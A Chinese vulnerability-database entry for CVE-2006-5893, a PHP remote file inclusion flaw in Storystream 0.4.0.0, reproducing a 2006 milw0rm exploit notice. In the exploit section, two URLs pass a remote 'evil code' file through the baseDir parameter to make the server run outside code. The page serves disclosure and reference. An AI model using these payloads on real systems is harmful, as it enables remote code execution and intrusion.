StoryStream BaseDir多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111521 漏洞类型 输入验证
发布时间 2006-11-12 更新时间 2006-11-15
CVE编号 CVE-2006-5893 CNNVD-ID CNNVD-200611-217
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2767
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-217
|漏洞详情
iWonderDesignsStorystream0.4.0.0存在多个PHP远程文件包含漏洞,远程攻击者可以通过传给在include/classes/pear/DB/内(1)mysql.php和(2)mysqli.php的baseDir参数中的URL执行任意PHP代码。
|漏洞EXP
#########################################################################################
################################### v1per-haCker
########################################
###################### How I Can lives Without FooL Programmer!
#########################
#########################################################################################
#=======================================================================================#
#___________________________________Storystream (RFI)___________________________________#
#=======================================================================================#
# Information:-                                                                         #
#                                                                                       #
# Scripts: Storystream                                                                  #
# download :    http://www.iwonderdesigns.com/downloads/storystream_beta_0.4.0.0.zip    #
# Version : 4                                                                           #
# Dork & vuln : download script and think :)                                            #
#                                                                                       #
#=======================================================================================#
# Exploit :                                                                             #
#                                                                                       #
#http://localhost/path/include/classes/pear/DB/mysql.php?baseDir=http://EvElCoDe.txt?   #
#http://localhost/path/include/classes/pear/DB/mysqli.php?baseDir=http://EvElCoDe.txt?  #
#                                                                                       #
#=======================================================================================#
# Discoverd By : v1per-haCker                                                           #
#                                                                                       #
# Conatact : v1per-hacker[at]hotmail.com                                                #
#                                                                                       #
# XP10_hackEr Team              >>      www.xp10.com                                    #
# SpeciaL PoweR SecuritY TeaM   >>      www.specialpower.org                            #
#                                                                                       #
# Greetz to :   | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL  |		#
#               | ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB |           #
#               | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota   |           #
#               | MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO  |           #
#               |  MuhaciR  |Skrmhcr-GVinux | Jean | fucker_net | Sir-ToTTi |           #
#                                                                                       #
# Thanks >>     /str0ke & www.milw0rm.com & www.google.com                              #
#=======================================================================================#
#########################################################################################
################################# L0ve is L1fe W0und3r
##################################
#########################################################################################

# milw0rm.com [2006-11-12]
|参考资料

来源:XF
名称:storystream-mysql-file-include(30191)
链接:http://xforce.iss.net/xforce/xfdb/30191
来源:BID
名称:21012
链接:http://www.securityfocus.com/bid/21012
来源:MILW0RM
名称:2767
链接:http://www.milw0rm.com/exploits/2767
来源:VUPEN
名称:ADV-2006-4480
链接:http://www.frsirt.com/english/advisories/2006/4480
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?release_id=463892&group_id=95217
来源:SECTRACK
名称:1017252
链接:http://securitytracker.com/id?1017252
来源:MILW0RM
名称:2767
链接:http://milw0rm.com/exploits/2767
来源:BUGTRAQ
名称:20061116Storystream=>4.0RemoteFileIncludeVulnerabilityExploit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=116374093504388&w=2